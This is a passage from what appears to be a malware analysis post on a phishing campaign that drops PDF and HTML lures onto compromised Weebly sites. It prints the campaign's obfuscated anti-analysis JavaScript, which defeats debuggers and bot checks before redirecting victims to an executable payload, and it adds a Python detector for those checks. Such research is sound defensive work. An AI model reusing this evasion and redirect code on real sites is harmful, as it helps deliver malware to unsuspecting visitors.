‘\x71\x75\x67\x62\x47’: _0x2b74(‘\x30\x78\x61\x34’, ‘\x74\x51\x5b\x55’),
‘\x4e\x44\x64\x45\x73’: function(_0x3835cb, _0x171d0c) {
return _0x3835cb === _0x171d0c;
},
‘\x52\x63\x44\x73\x49’: function(_0x1db092, _0x401f2f) {
return _0x1db092 % _0x401f2f;
},
‘\x75\x4c\x75\x59\x66’: function(_0x2ac878, _0x180197) {
return _0x2ac878 != _0x180197;
},
‘\x79\x6f\x6d\x48\x48’: _0x2b74(‘\x30\x78\x36\x31’, ‘\x5e\x72\x43\x28’),
‘\x66\x55\x65\x66\x6d’: _0x2b74(‘\x30\x78\x63\x34’, ‘\x48\x59\x58\x62’),
‘\x4f\x6d\x6c\x4d\x50’: function(_0x252d1f, _0x314af6) {
return _0x252d1f(_0x314af6);
},
‘\x6e\x50\x68\x6d\x42’: _0x2b74(‘\x30\x78\x33\x36’, ‘\x31\x4b\x37\x6f’),
‘\x47\x5a\x44\x79\x67’: _0x2b74(‘\x30\x78\x38\x32’, ‘\x41\x68\x6c\x62’),
‘\x52\x4e\x48\x47\x4e’: function(_0x162fb8, _0x542a7a) {
return _0x162fb8 + _0x542a7a;
},
‘\x4f\x48\x6b\x5a\x54’: _0x2b74(‘\x30\x78\x63\x30’, ‘\x48\x59\x58\x62’),
‘\x6e\x78\x74\x4d\x6c’: function(_0x53a7d7, _0x4e5e3e) {
return _0x53a7d7(_0x4e5e3e);
},
‘\x4d\x55\x76\x74\x4b’: function(_0x56a74c) {
return _0x56a74c();
},
‘\x61\x6d\x64\x71\x41’: function(_0x149717, _0x2541ca, _0x353ecc) {
return _0x149717(_0x2541ca, _0x353ecc);
},
‘\x4d\x7a\x64\x4a\x42’: _0x2b74(‘\x30\x78\x37\x32’, ‘\x65\x29\x33\x51’),
‘\x67\x6d\x6c\x4d\x70’: _0x2b74(‘\x30\x78\x38\x65’, ‘\x6e\x33\x71\x72’),
‘\x74\x50\x4d\x42\x6c’: function(_0x53722e) {
return _0x53722e();
},
‘\x51\x6e\x4b\x45\x51’: function(_0x26b2f4) {
return _0x26b2f4();
},
‘\x67\x4f\x42\x4f\x51’: ‘\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29’,
‘\x55\x46\x45\x6f\x51’: function(_0x320cbd, _0x1fb761) {
return _0x320cbd + _0x1fb761;
},
‘\x45\x43\x56\x43\x78’: ‘\x69\x7a\x57\x66\x61’,
‘\x52\x66\x57\x6e\x6f’: function(_0xc37d3d, _0x398111) {
return _0xc37d3d * _0x398111;
},
‘\x44\x48\x56\x48\x57’: function(_0x54d57f, _0x80d020) {
return _0x54d57f * _0x80d020;
},
‘\x63\x76\x68\x67\x51’: function(_0x257511, _0xca1982) {
return _0x257511 < _0xca1982;
},
‘\x6c\x56\x68\x4f\x66’: _0x2b74(‘\x30\x78\x64\x34’, ‘\x42\x46\x4f\x38’),
‘\x53\x58\x48\x4d\x76’: _0x2b74(‘\x30\x78\x38\x36’, ‘\x41\x68\x6c\x62’),
‘\x77\x75\x7a\x4b\x6f’: function(_0x6e3576, _0x3e32fe) {
return _0x6e3576 === _0x3e32fe;
},
‘\x54\x67\x42\x4c\x74’: _0x2b74(‘\x30\x78\x62\x62’, ‘\x6e\x33\x71\x72’),
‘\x61\x43\x57\x4a\x44’: _0x2b74(‘\x30\x78\x36\x65’, ‘\x28\x39\x4a\x54’),
‘\x52\x48\x48\x57\x6b’: function(_0x11de68, _0x5615ae) {
return _0x11de68 === _0x5615ae;
},
‘\x76\x55\x4f\x6c\x4c’: function(_0x5098c4, _0x174e2e) {
return _0x5098c4 === _0x174e2e;
},
‘\x4e\x4f\x63\x59\x61’: function(_0x401644, _0x2e7ca9) {
return _0x401644 === _0x2e7ca9;
},
‘\x67\x42\x73\x77\x4e’: ‘\x55\x59\x4c\x76\x52’,
‘\x4c\x73\x52\x56\x4d’: _0x2b74(‘\x30\x78\x62\x66’, ‘\x48\x59\x58\x62’),
‘\x4c\x54\x7a\x45\x4b’: function(_0x157ceb, _0x308ee5) {
return _0x157ceb == _0x308ee5;
},
‘\x6a\x77\x4d\x4f\x66’: function(_0x58247b, _0x36d56) {
return _0x58247b !== _0x36d56;
},
‘\x77\x6e\x51\x57\x6e’: _0x2b74(‘\x30\x78\x33\x34’, ‘\x71\x36\x59\x5b’),
‘\x70\x41\x4c\x4c\x61’: function(_0x5c2048, _0x30c7d1) {
return _0x5c2048 != _0x30c7d1;
},
‘\x7a\x6f\x65\x69\x48’: _0x2b74(‘\x30\x78\x36\x62’, ‘\x57\x2a\x58\x26’),
‘\x72\x7a\x69\x6f\x4e’: function(_0x22e57a, _0x290864) {
return _0x22e57a === _0x290864;
},
‘\x73\x55\x4a\x43\x52’: function(_0x1df977, _0x5584bb) {
return _0x1df977 + _0x5584bb;
},
‘\x63\x46\x74\x65\x67’: _0x2b74(‘\x30\x78\x34\x37’, ‘\x35\x29\x74\x52’),
‘\x61\x45\x67\x54\x50’: _0x2b74(‘\x30\x78\x39\x30’, ‘\x37\x77\x69\x66’),
‘\x56\x61\x7a\x58\x4c’: ‘\x77\x69\x6e\x64\x6f\x77\x2e\x68\x69\x73\x74\x6f\x72\x79\x2e\x66\x6f\x72\x77\x61\x72\x64\x28\x29\x3b’
};
num = _0x292066[_0x2b74(‘\x30\x78\x33\x39’, ‘\x67\x6b\x63\x4e’)](_0x355530, 0x1, _0x292066[_0x2b74(‘\x30\x78\x33\x32’, ‘\x32\x43\x65\x4e’)](_0x292066[_0x2b74(‘\x30\x78\x37\x34’, ‘\x55\x41\x35\x25’)](0x2, 0x4), 0x6) * 0x9);
if (_0x292066[_0x2b74(‘\x30\x78\x36\x63’, ‘\x24\x29\x53\x73’)](num, 0x1)) {
if (_0x2b74(‘\x30\x78\x38\x31’, ‘\x33\x6b\x68\x46’) === _0x292066[‘\x6c\x56\x68\x4f\x66’]) {
_0x19dc3b = !![];
} else {
var _0x56a05e = fn[_0x2b74(‘\x30\x78\x35\x64’, ‘\x51\x5d\x75\x40’)](context, arguments);
fn = null;
return _0x56a05e;
}
} else {
if (_0x292066[‘\x4e\x44\x64\x45\x73’](_0x2b74(‘\x30\x78\x31\x66’, ‘\x4a\x71\x4c\x64’), _0x292066[_0x2b74(‘\x30\x78\x63\x32’, ‘\x38\x38\x32\x4f’)])) {
window[_0x2b74(‘\x30\x78\x63\x66’, ‘\x32\x74\x67\x73’)][_0x2b74(‘\x30\x78\x64\x33’, ‘\x48\x59\x58\x62’)]();
} else {
_0x19dc3b = ![];
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x35\x62’, ‘\x58\x73\x52\x4c’)](_0x19dc3b, !![])) {
if (_0x292066[_0x2b74(‘\x30\x78\x39\x31’, ‘\x55\x41\x35\x25’)](_0x2b74(‘\x30\x78\x62\x65’, ‘\x6e\x75\x61\x7a’), _0x292066[_0x2b74(‘\x30\x78\x31\x34’, ‘\x41\x68\x6c\x62’)])) {
if (_0x292066[_0x2b74(‘\x30\x78\x33\x38’, ‘\x2a\x21\x25\x5d’)](_0x292066[‘\x58\x6a\x47\x4d\x5a’](”, _0x292066[_0x2b74(‘\x30\x78\x35\x33’, ‘\x63\x67\x6e\x25’)](counter, counter))[_0x292066[_0x2b74(‘\x30\x78\x31\x61’, ‘\x52\x74\x36\x77’)]], 0x1) || _0x292066[‘\x4e\x44\x64\x45\x73’](_0x292066[_0x2b74(‘\x30\x78\x62\x61’, ‘\x63\x67\x6e\x25’)](counter, 0x14), 0x0)) {
debugger ;
} else {
debugger ;
}
} else {
stoper = 0x1;
}
}
if (/HeadlessChrome/[_0x2b74(‘\x30\x78\x37\x39’, ‘\x5e\x72\x43\x28’)](window[_0x2b74(‘\x30\x78\x62\x36’, ‘\x67\x38\x67\x67’)][‘\x75\x73\x65\x72\x41\x67\x65\x6e\x74’])) {
if (_0x292066[‘\x58\x51\x73\x55\x51’](_0x292066[‘\x61\x43\x57\x4a\x44’], _0x292066[_0x2b74(‘\x30\x78\x37\x33’, ‘\x6e\x33\x71\x72’)])) {
if (!Function[_0x2b74(‘\x30\x78\x61\x39’, ‘\x75\x68\x29\x44’)][_0x2b74(‘\x30\x78\x34\x61’, ‘\x4a\x71\x4c\x64’)]) {
botFound = 0x1;
return;
}
if (_0x292066[‘\x75\x4c\x75\x59\x66’](Function[_0x2b74(‘\x30\x78\x34\x38’, ‘\x24\x29\x53\x73’)][_0x2b74(‘\x30\x78\x61\x36’, ‘\x21\x63\x46\x41’)][_0x2b74(‘\x30\x78\x34\x33’, ‘\x21\x63\x46\x41’)]()[_0x2b74(‘\x30\x78\x39\x39’, ‘\x44\x4f\x64\x47’)](/bind/g, _0x292066[‘\x79\x6f\x6d\x48\x48’]), Error[_0x2b74(‘\x30\x78\x62\x38’, ‘\x51\x5d\x75\x40’)]())) {
botFound = 0x1;
return;
}
if (Function[_0x2b74(‘\x30\x78\x30’, ‘\x44\x54\x49\x4a’)][_0x2b74(‘\x30\x78\x37\x36’, ‘\x57\x2a\x58\x26’)][_0x2b74(‘\x30\x78\x61\x33’, ‘\x74\x51\x5b\x55’)]()[_0x2b74(‘\x30\x78\x35\x30’, ‘\x45\x58\x37\x54’)](/toString/g, _0x292066[_0x2b74(‘\x30\x78\x64\x38’, ‘\x75\x68\x29\x44’)]) != Error[_0x2b74(‘\x30\x78\x37\x35’, ‘\x5e\x72\x43\x28’)]()) {
botFound = 0x1;
return;
}
} else {
botFound = 0x1;
}
}
if (navigator[_0x2b74(‘\x30\x78\x34\x36’, ‘\x37\x77\x69\x66’)]) {
if (_0x292066[_0x2b74(‘\x30\x78\x35\x63’, ‘\x28\x57\x4c\x32’)](_0x2b74(‘\x30\x78\x31\x37’, ‘\x4e\x6a\x24\x6d’), _0x2b74(‘\x30\x78\x32’, ‘\x48\x59\x58\x62’))) {
_0x292066[‘\x61\x6d\x64\x71\x41’](_0x102c43, this, function() {
var _0x3bfdd2 = new RegExp(‘\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x2a\x5c\x28\x20\x2a\x5c\x29’);
var _0xda1de4 = new RegExp(_0x292066[_0x2b74(‘\x30\x78\x31’, ‘\x5a\x4e\x78\x6f’)],’\x69′);
var _0x3aa548 = _0x292066[_0x2b74(‘\x30\x78\x31\x35’, ‘\x54\x51\x24\x79’)](_0x5c5f61, _0x292066[_0x2b74(‘\x30\x78\x32\x35’, ‘\x57\x2a\x58\x26’)]);
if (!_0x3bfdd2[_0x2b74(‘\x30\x78\x63\x37’, ‘\x45\x58\x37\x54’)](_0x292066[_0x2b74(‘\x30\x78\x34\x39’, ‘\x45\x35\x56\x7a’)](_0x3aa548, _0x292066[_0x2b74(‘\x30\x78\x36\x33’, ‘\x38\x38\x32\x4f’)])) || !_0xda1de4[_0x2b74(‘\x30\x78\x39\x37’, ‘\x5a\x4e\x78\x6f’)](_0x292066[‘\x52\x4e\x48\x47\x4e’](_0x3aa548, _0x292066[_0x2b74(‘\x30\x78\x33\x65’, ‘\x44\x4f\x64\x47’)]))) {
_0x292066[_0x2b74(‘\x30\x78\x32\x36’, ‘\x30\x36\x32\x26’)](_0x3aa548, ‘\x30’);
} else {
_0x292066[‘\x4d\x55\x76\x74\x4b’](_0x5c5f61);
}
})();
} else {
botFound = 0x1;
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x38\x63’, ‘\x42\x46\x4f\x38’)](navigator[_0x2b74(‘\x30\x78\x61\x32’, ‘\x38\x38\x32\x4f’)], ”)) {
botFound = 0x1;
}
if (window[‘\x63\x61\x6c\x6c\x50\x68\x61\x6e\x74\x6f\x6d’] || window[_0x2b74(‘\x30\x78\x32\x61’, ‘\x5e\x72\x43\x28’)]) {
if (_0x292066[‘\x4e\x4f\x63\x59\x61’](_0x292066[_0x2b74(‘\x30\x78\x65’, ‘\x76\x45\x5b\x54’)], _0x2b74(‘\x30\x78\x36\x61’, ‘\x74\x51\x5b\x55’))) {
var _0x73dfb1 = function() {
var _0x554545 = _0x73dfb1[_0x2b74(‘\x30\x78\x64’, ‘\x64\x44\x6a\x4f’)](_0x292066[_0x2b74(‘\x30\x78\x38\x35’, ‘\x4e\x6a\x24\x6d’)])()[_0x2b74(‘\x30\x78\x32\x34’, ‘\x32\x74\x67\x73’)](_0x292066[_0x2b74(‘\x30\x78\x34\x63’, ‘\x21\x31\x54\x42’)]);
return !_0x554545[_0x2b74(‘\x30\x78\x38\x62’, ‘\x4a\x71\x4c\x64’)](_0x3b6a81);
};
return _0x292066[_0x2b74(‘\x30\x78\x32\x31’, ‘\x28\x39\x4a\x54’)](_0x73dfb1);
} else {
botFound = 0x1;
}
}
(function() {
if (!Function[_0x2b74(‘\x30\x78\x32\x63’, ‘\x6e\x33\x71\x72’)][_0x2b74(‘\x30\x78\x38\x33’, ‘\x54\x51\x24\x79’)]) {
botFound = 0x1;
return;
}
if (_0x292066[‘\x75\x4c\x75\x59\x66’](Function[_0x2b74(‘\x30\x78\x38’, ‘\x6e\x75\x61\x7a’)][_0x2b74(‘\x30\x78\x35\x36’, ‘\x74\x51\x5b\x55’)][_0x2b74(‘\x30\x78\x36\x39’, ‘\x6e\x33\x71\x72’)]()[_0x2b74(‘\x30\x78\x36\x66’, ‘\x76\x45\x5b\x54’)](/bind/g, _0x292066[_0x2b74(‘\x30\x78\x64\x30’, ‘\x64\x44\x6a\x4f’)]), Error[_0x2b74(‘\x30\x78\x32\x62’, ‘\x33\x6b\x68\x46’)]())) {
botFound = 0x1;
return;
}
if (_0x292066[_0x2b74(‘\x30\x78\x36\x36’, ‘\x35\x29\x74\x52’)](Function[_0x2b74(‘\x30\x78\x36\x30’, ‘\x38\x38\x32\x4f’)][‘\x74\x6f\x53\x74\x72\x69\x6e\x67’][_0x2b74(‘\x30\x78\x61\x33’, ‘\x74\x51\x5b\x55’)]()[_0x2b74(‘\x30\x78\x36\x34’, ‘\x57\x2a\x58\x26’)](/toString/g, _0x292066[‘\x79\x6f\x6d\x48\x48’]), Error[_0x2b74(‘\x30\x78\x64\x31’, ‘\x32\x74\x67\x73’)]())) {
botFound = 0x1;
return;
}
}());
if (window[_0x2b74(‘\x30\x78\x63’, ‘\x21\x63\x46\x41’)][_0x2b74(‘\x30\x78\x38\x37’, ‘\x28\x57\x4c\x32’)][‘\x67\x65\x74\x41\x74\x74\x72\x69\x62\x75\x74\x65’](_0x2b74(‘\x30\x78\x33\x66’, ‘\x62\x76\x54\x46’))) {
if (_0x292066[_0x2b74(‘\x30\x78\x31\x63’, ‘\x37\x77\x69\x66’)] === _0x2b74(‘\x30\x78\x66’, ‘\x32\x74\x67\x73’)) {
botFound = 0x1;
} else {
var _0x57a6c7 = function() {
while (!![]) {}
};
return _0x292066[_0x2b74(‘\x30\x78\x36\x32’, ‘\x54\x58\x57\x4d’)](_0x57a6c7);
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x61\x66’, ‘\x44\x54\x49\x4a’)](navigator[_0x2b74(‘\x30\x78\x35\x66’, ‘\x65\x29\x33\x51’)], !![])) {
if (_0x292066[_0x2b74(‘\x30\x78\x62\x30’, ‘\x28\x39\x4a\x54’)](_0x292066[_0x2b74(‘\x30\x78\x37\x37’, ‘\x75\x68\x29\x44’)], _0x292066[_0x2b74(‘\x30\x78\x34\x62’, ‘\x31\x4b\x37\x6f’)])) {
var _0x3a2240 = firstCall ? function() {
if (fn) {
var _0x398ec5 = fn[_0x2b74(‘\x30\x78\x63\x64’, ‘\x44\x4f\x64\x47’)](context, arguments);
fn = null;
return _0x398ec5;
}
}
: function() {}
;
firstCall = ![];
return _0x3a2240;
} else {
botFound = 0x1;
}
}
if (window[_0x2b74(‘\x30\x78\x34\x64’, ‘\x6e\x33\x71\x72’)] || window[_0x2b74(‘\x30\x78\x36\x38’, ‘\x54\x51\x24\x79’)]) {
if (‘\x51\x69\x52\x56\x4c’ === _0x2b74(‘\x30\x78\x63\x39’, ‘\x71\x36\x59\x5b’)) {
botFound = 0x1;
} else {
var _0x354d13 = new RegExp(_0x292066[‘\x67\x4f\x42\x4f\x51’]);
var _0x3892a4 = new RegExp(_0x292066[‘\x66\x55\x65\x66\x6d’],’\x69′);
var _0x40dc95 = _0x5c5f61(_0x292066[_0x2b74(‘\x30\x78\x37’, ‘\x24\x29\x53\x73’)]);
if (!_0x354d13[_0x2b74(‘\x30\x78\x37\x39’, ‘\x5e\x72\x43\x28’)](_0x292066[_0x2b74(‘\x30\x78\x38\x61’, ‘\x45\x58\x37\x54’)](_0x40dc95, _0x292066[_0x2b74(‘\x30\x78\x37\x62’, ‘\x32\x43\x65\x4e’)])) || !_0x3892a4[_0x2b74(‘\x30\x78\x61\x65’, ‘\x21\x31\x54\x42’)](_0x40dc95 + _0x292066[‘\x4f\x48\x6b\x5a\x54’])) {
_0x292066[_0x2b74(‘\x30\x78\x32\x39’, ‘\x75\x68\x29\x44’)](_0x40dc95, ‘\x30’);
} else {
_0x292066[‘\x51\x6e\x4b\x45\x51’](_0x5c5f61);
}
}
}
if (_0x292066[_0x2b74(‘\x30\x78\x63\x35’, ‘\x45\x35\x56\x7a’)](window[_0x2b74(‘\x30\x78\x61\x37’, ‘\x32\x43\x65\x4e’)], 0x1) && _0x292066[‘\x4e\x4f\x63\x59\x61’](window[‘\x62\x6f\x74\x46\x6f\x75\x6e\x64’], 0x0)) {
if (_0x292066[_0x2b74(‘\x30\x78\x32\x37’, ‘\x67\x38\x67\x67’)](_0x292066[‘\x7a\x6f\x65\x69\x48’], _0x292066[_0x2b74(‘\x30\x78\x61’, ‘\x4e\x6a\x24\x6d’)])) {
var _0x2e75d6 = window[_0x2b74(‘\x30\x78\x31\x30’, ‘\x43\x73\x40\x25’)][_0x2b74(‘\x30\x78\x63\x63’, ‘\x74\x51\x5b\x55’)][‘\x73\x6c\x69\x63\x65’](0x1);
if (_0x292066[_0x2b74(‘\x30\x78\x34\x35’, ‘\x76\x45\x5b\x54’)](_0x2e75d6, ”)) {
_0x2e75d6 = window[_0x2b74(‘\x30\x78\x35\x39’, ‘\x76\x45\x5b\x54’)][_0x2b74(‘\x30\x78\x36’, ‘\x55\x41\x35\x25’)][_0x2b74(‘\x30\x78\x39\x34’, ‘\x52\x74\x36\x77’)](_0x292066[_0x2b74(‘\x30\x78\x64\x36’, ‘\x2a\x21\x25\x5d’)](window[_0x2b74(‘\x30\x78\x62\x35’, ‘\x6e\x33\x71\x72’)][_0x2b74(‘\x30\x78\x33\x61’, ‘\x44\x4f\x64\x47’)][_0x2b74(‘\x30\x78\x39\x66’, ‘\x5e\x72\x43\x28’)](‘\x23’), 0x1));
}
var _0x58061a = _0x292066[‘\x63\x46\x74\x65\x67’];
document[_0x2b74(‘\x30\x78\x38\x34’, ‘\x49\x26\x38\x4b’)][_0x2b74(‘\x30\x78\x34\x30’, ‘\x5a\x4e\x78\x6f’)] = _0x292066[_0x2b74(‘\x30\x78\x39\x35’, ‘\x21\x31\x54\x42’)](_0x58061a, _0x292066[_0x2b74(‘\x30\x78\x34\x34’, ‘\x51\x5d\x75\x40’)]) + _0x2e75d6;
_0x292066[_0x2b74(‘\x30\x78\x39\x61’, ‘\x49\x26\x38\x4b’)](setTimeout, _0x292066[_0x2b74(‘\x30\x78\x64\x32’, ‘\x76\x4c\x37\x59’)], 0x0);
window[_0x2b74(‘\x30\x78\x36\x37’, ‘\x45\x35\x56\x7a’)] = function() {
var _0x13d432 = {
‘\x57\x6e\x6a\x61\x73’: function(_0x4f5ed5) {
return _0x292066[_0x2b74(‘\x30\x78\x61\x62’, ‘\x36\x50\x5a\x47’)](_0x4f5ed5);
}
};
if (_0x292066[‘\x45\x43\x56\x43\x78’] !== _0x2b74(‘\x30\x78\x35\x34’, ‘\x64\x44\x6a\x4f’)) {
null;
} else {
_0x13d432[_0x2b74(‘\x30\x78\x31\x62’, ‘\x2a\x21\x25\x5d’)](_0x5c5f61);
}
}
;
} else {
botFound = 0x1;
}
}
}
function _0x47b803() {}
function _0x5c5f61(_0x3d4ef9) {
var _0x958405 = {
‘\x4c\x58\x45\x56\x79’: _0x2b74(‘\x30\x78\x35\x35’, ‘\x32\x43\x65\x4e’),
‘\x76\x77\x53\x4c\x69’: function(_0x1b126c, _0x2283f8) {
return _0x1b126c * _0x2283f8;
},
‘\x44\x4c\x49\x73\x49’: function(_0xa896f2, _0x3dcba0) {
return _0xa896f2 > _0x3dcba0;
},
‘\x64\x79\x46\x4f\x6e’: function(_0x550534, _0x4c8cc3, _0x29892e) {
return _0x550534(_0x4c8cc3, _0x29892e);
},
‘\x66\x43\x72\x6f\x44’: function(_0x169c35, _0x10cca4) {
return _0x169c35 – _0x10cca4;
},
‘\x57\x58\x70\x49\x63’: _0x2b74(‘\x30\x78\x33\x37’, ‘\x52\x74\x36\x77’),
‘\x45\x4f\x4a\x75\x77’: function(_0x53c43a, _0x130863) {
return _0x53c43a === _0x130863;
},
‘\x43\x74\x49\x7a\x4a’: ‘\x44\x4b\x57\x67\x51’,
‘\x58\x75\x54\x41\x51’: function(_0x37f3f3) {
return _0x37f3f3();
},
‘\x70\x79\x77\x47\x46’: function(_0x7a6ea6, _0xfb52a9) {
return _0x7a6ea6 === _0xfb52a9;
},
‘\x76\x72\x75\x45\x71’: _0x2b74(‘\x30\x78\x37\x66’, ‘\x5e\x50\x4b\x49’),
‘\x73\x51\x53\x73\x41’: _0x2b74(‘\x30\x78\x33\x33’, ‘\x30\x36\x32\x26’),
‘\x61\x4e\x4c\x55\x4b’: function(_0x5d6cd1, _0x193cae) {
return _0x5d6cd1 !== _0x193cae;
},
‘\x79\x67\x78\x45\x4e’: function(_0x156d2b, _0xc9c318) {
return _0x156d2b / _0xc9c318;
},
‘\x42\x59\x77\x55\x6a’: _0x2b74(‘\x30\x78\x61\x31’, ‘\x2a\x21\x25\x5d’),
‘\x4e\x78\x4c\x4f\x46’: _0x2b74(‘\x30\x78\x38\x38’, ‘\x2a\x21\x25\x5d’),
‘\x4a\x6b\x79\x77\x78’: function(_0x164679, _0x559fd2) {
return _0x164679(_0x559fd2);
},
‘\x55\x76\x53\x45\x43’: _0x2b74(‘\x30\x78\x38\x30’, ‘\x6e\x33\x71\x72’),
‘\x76\x56\x41\x77\x41’: function(_0x1d5f32, _0x1d6c90) {
return _0x1d5f32(_0x1d6c90);
}
};
function _0x483faa(_0x1eabd1) {
var _0x4404d8 = {
‘\x54\x6d\x78\x41\x76’: function(_0x16ba48, _0x21289c) {
return _0x16ba48(_0x21289c);
}
};
if (typeof _0x1eabd1 === _0x958405[‘\x57\x58\x70\x49\x63’]) {
if (_0x958405[_0x2b74(‘\x30\x78\x32\x64’, ‘\x4e\x6a\x24\x6d’)](_0x958405[‘\x43\x74\x49\x7a\x4a’], _0x2b74(‘\x30\x78\x32\x66’, ‘\x33\x6b\x68\x46’))) {
_0x4404d8[_0x2b74(‘\x30\x78\x61\x63’, ‘\x48\x59\x58\x62’)](result, ‘\x30’);
} else {
var _0x2d4448 = function() {
if (_0x958405[_0x2b74(‘\x30\x78\x62\x39’, ‘\x21\x63\x46\x41’)] !== _0x958405[‘\x4c\x58\x45\x56\x79’]) {
botFound = 0x1;
} else {
while (!![]) {}
}
};
return _0x958405[‘\x58\x75\x54\x41\x51’](_0x2d4448);
}
} else {
if (_0x958405[_0x2b74(‘\x30\x78\x35’, ‘\x54\x51\x24\x79’)](_0x958405[_0x2b74(‘\x30\x78\x61\x30’, ‘\x36\x50\x5a\x47’)], _0x958405[_0x2b74(‘\x30\x78\x34\x65’, ‘\x64\x44\x6a\x4f’)])) {
for (a = 0x1; a <= iterations; a++) {
num = _0x958405[_0x2b74(‘\x30\x78\x36\x64’, ‘\x30\x36\x32\x26’)](Math[_0x2b74(‘\x30\x78\x38\x66’, ‘\x63\x67\x6e\x25’)](), 0x2710);
}
if (_0x958405[_0x2b74(‘\x30\x78\x36\x35’, ‘\x71\x36\x59\x5b’)](depth, 0x0)) {
return _0x958405[‘\x64\x79\x46\x4f\x6e’](_0x355530, Math[_0x2b74(‘\x30\x78\x33\x62’, ‘\x28\x39\x4a\x54’)](num, 0x1), _0x958405[_0x2b74(‘\x30\x78\x61\x61’, ‘\x49\x26\x38\x4b’)](depth, 0x1));
} else {
return num;
}
} else {
if (_0x958405[‘\x61\x4e\x4c\x55\x4b’]((” + _0x958405[‘\x79\x67\x78\x45\x4e’](_0x1eabd1, _0x1eabd1))[_0x958405[_0x2b74(‘\x30\x78\x64\x35’, ‘\x42\x46\x4f\x38’)]], 0x1) || _0x958405[_0x2b74(‘\x30\x78\x34\x32’, ‘\x31\x4b\x37\x6f’)](_0x1eabd1 % 0x14, 0x0)) {
if (_0x958405[_0x2b74(‘\x30\x78\x39\x63’, ‘\x65\x29\x33\x51’)](_0x958405[_0x2b74(‘\x30\x78\x63\x36’, ‘\x52\x74\x36\x77’)], _0x958405[_0x2b74(‘\x30\x78\x34\x66’, ‘\x76\x45\x5b\x54’)])) {
return num;
} else {
debugger ;
}
} else {
debugger ;
}
}
}
_0x958405[‘\x4a\x6b\x79\x77\x78’](_0x483faa, ++_0x1eabd1);
}
try {
if (_0x3d4ef9) {
if (_0x958405[‘\x55\x76\x53\x45\x43’] === _0x958405[_0x2b74(‘\x30\x78\x37\x63’, ‘\x51\x5d\x75\x40’)]) {
return _0x483faa;
} else {
botFound = 0x1;
}
} else {
_0x958405[‘\x76\x56\x41\x77\x41’](_0x483faa, 0x0);
}
} catch (_0x1611d5) {}
}
}
</script>
</head>
<body></body>
</html>

 

Because of the advanced anti-analysis JavaScript techniques, these malicious URLs are not detected by any security vendors. They all follow the same URL pattern, */uploads/1/3/*, and all of these malicious websites are hosted on Weebly (a website and eCommerce service). The attackers possibly compromised websites hosted on Weebly and dropped the malicious HTML and PDF documents into the uploads directory.

When the script detects neither a debugger nor a bot, it redirects the user to the page shown below, which delivers the payload “new toeic reading test.exe” to the victim. Different payloads are delivered depending on the input passed in the URL.

At the bottom of the PDF, more such malicious PDF links are provided. We observe various PDFs in this format hosted on the compromised web pages. The first malicious file in this campaign was observed on 2020-01-05 (hash: E684AEEAA0F12D415C0EF321341BCF2FF0CBE7B3099EFC8A2E99B49794F337D9), and over 20,000 unique malicious PDFs in this format have been collected in VirusTotal in the last 6 months.
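As an added defensive example (my code, not SonicWall's and not the campaign's script), this Python triage helper decodes the obfuscator-style hex string escapes, counts the anti-debugging and headless-browser checks that decide whether the redirect described above fires, and tests a URL against the */uploads/1/3/* lure path. The sample scripts and URLs are constructed; the digit layout in the path regex, the navigator.webdriver indicator and the scoring thresholds are assumptions, not values from the post.

```python
import re

# One obfuscator-style hex escape (backslash, x, two hex digits) as it
# appears in the raw source.
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")
# Identifiers of the form _0x2b74 / _0x483faa that the obfuscator emits.
OBF_IDENT = re.compile(r"\b_0x[0-9a-f]{3,6}\b")
# Path shape of the hosted lures: /uploads/1/3/<d>/<d>/<id>/<name>.pdf|html
# The two single digits and numeric id are an assumption derived from the
# listed URLs; the post itself only states the */uploads/1/3/* prefix.
CAMPAIGN_PATH = re.compile(
    r"/uploads/1/3/\d/\d/\d+/[^/?#\s]+\.(?:pdf|html?)\b", re.I)

# Anti-analysis checks, matched on the *decoded* text.  "webdriver" is the
# generic navigator.webdriver automation flag (an assumption); the others
# appear literally in the campaign script once its strings are decoded.
ANTI_ANALYSIS = {
    "debugger_statement": re.compile(r"\bdebugger\b"),
    "headless_chrome_ua": re.compile(r"HeadlessChrome"),
    "phantomjs_hook": re.compile(r"\bcallPhantom\b"),
    "webdriver_flag": re.compile(r"\bwebdriver\b"),
    "history_forward_redirect": re.compile(r"window\.history\.forward\s*\("),
    "busy_loop_stall": re.compile(r"while\s*\(\s*(?:!!\[\]|true)\s*\)\s*\{\s*\}"),
}


def decode_hex_escapes(js: str) -> str:
    """Replace every hex escape with the character it encodes."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), js)


def triage(js: str) -> dict:
    """Combine obfuscation signals with anti-analysis hits into a verdict."""
    decoded = decode_hex_escapes(js)
    hits = {}
    for name, pattern in ANTI_ANALYSIS.items():
        count = len(pattern.findall(decoded))
        if count:
            hits[name] = count
    identifiers = set(OBF_IDENT.findall(js))
    escapes = len(HEX_ESCAPE.findall(js))
    # Thresholds are triage heuristics, not values from the post.
    obfuscated = len(identifiers) >= 5 or escapes >= 20
    if obfuscated and len(hits) >= 2:
        verdict = "gated-landing-page"   # evasion checks guarding a redirect
    elif obfuscated or hits:
        verdict = "review"
    else:
        verdict = "clean"
    return {
        "obfuscated": obfuscated,
        "unique_obfuscated_identifiers": len(identifiers),
        "hex_escaped_chars": escapes,
        "anti_analysis": hits,
        "verdict": verdict,
    }


def matches_campaign_path(url: str) -> bool:
    """True when a URL's path has the /uploads/1/3/... lure shape."""
    return CAMPAIGN_PATH.search(url) is not None


# Constructed sample in the campaign's style (not the live script): a few
# of its checks, with property names hex-escaped the way the obfuscator does.
SAMPLE_JS = r"""
var _0x2b74 = function(_0x1dce8c, _0x5b051f) { return _0x5b05[_0x1dce8c]; };
botFound = 0x0;
if (/HeadlessChrome/['\x74\x65\x73\x74'](window['\x6e\x61\x76\x69\x67\x61\x74\x6f\x72']['\x75\x73\x65\x72\x41\x67\x65\x6e\x74'])) { botFound = 0x1; }
if (window['\x63\x61\x6c\x6c\x50\x68\x61\x6e\x74\x6f\x6d']) { botFound = 0x1; }
if (navigator['\x77\x65\x62\x64\x72\x69\x76\x65\x72'] === !![]) { botFound = 0x1; }
var _0x57a6c7 = function() { while (!![]) {} };
function _0x483faa(_0x1eabd1) { if (_0x1eabd1 % 0x14 === 0x0) { debugger; } else { debugger; } }
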